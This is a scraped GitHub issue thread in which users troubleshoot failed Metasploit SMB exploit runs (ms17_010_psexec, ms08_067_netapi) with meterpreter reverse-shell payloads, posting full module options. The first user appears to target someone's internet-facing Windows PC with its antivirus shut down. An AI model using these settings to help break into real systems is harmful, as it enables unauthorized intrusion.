Metasploit-framework: Rex Connection Timeout

Created on 6 Sep 2018  路  8Comments  路  Source: rapid7/metasploit-framework

Hey got an issue with the payload windows/meterpreter/reverse_tcp
Im Using Windows 10 and the "1" Port is an self created open port
Can u pls tell me whats wrong with the timeout? I got an stable Internet connection so i see no reason why it should do this...

[-] []34:1 - Rex::ConnectionTimeout: The connection timed out ([]34:1).
[*] Exploit completed, but no session was created.
msf exploit(windows/smb/ms17_010_psexec) >

Most helpful comment

Yeah, you're unlikely to hit an actual SMB service on any port other than 445. And if this across the internet, any reasonable ISP has that port blocked anyway. You'll likely have to find some other way in.

All 8 comments

Show us your options.

Name Current Setting Required Description
---- --------------- -------- -----------
DBGTRACE false yes Show extra debug trace info
LEAKATTEMPTS 99 yes How many times to try to leak transaction
NAMEDPIPE no A named pipe that can be connected to (leave blank for auto)
NAMED_PIPES C:/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.17.8/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOST [].34 yes The target address
RPORT 1 yes The Target port
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass 1234 no The password for the specified username
SMBUser Silke no The username to authenticate as

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST [].39 yes The listen address (an interface may be specified)
LPORT 1 yes The listen port

Exploit target:

Id Name


0 Automatic

[].34:1 - Rex::ConnectionTimeout: The connection timed out ([].34:1)

The Target PC has Windows 7 and programs like Kaspersky got shutted down. Also ofc he was online and i created by my self a open port

thank for the reply :)

I don't think your RPORT should be 1 unless it's forwarded. Normally it should be 445.

Yeah, you're unlikely to hit an actual SMB service on any port other than 445. And if this across the internet, any reasonable ISP has that port blocked anyway. You'll likely have to find some other way in.

show options

Module options (exploit/windows/smb/ms08_067_netapi):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.10.10.4 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.29.87 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port

Exploit target:

Id Name


0 Automatic Targeting

msf6 exploit(windows/smb/ms08_067_netapi) > run

[] Started reverse TCP handler on 192.168.29.87:4444
[
] Exploit completed, but no session was created.

pls pls pls solve this problem

pls pls pls solve this problem

The connection to 10.10.10.4:445 timed out. Ensure that you can access 10.10.10.4:445. You can test with netcat: nc 10.10.10.4 445 -v

Was this page helpful?
0 / 5 - 0 ratings

Related issues

Acidical picture Acidical  路  3Comments

notdodo picture notdodo  路  3Comments

wvu-r7 picture wvu-r7  路  3Comments

Funeoz picture Funeoz  路  3Comments

0x27 picture 0x27  路  3Comments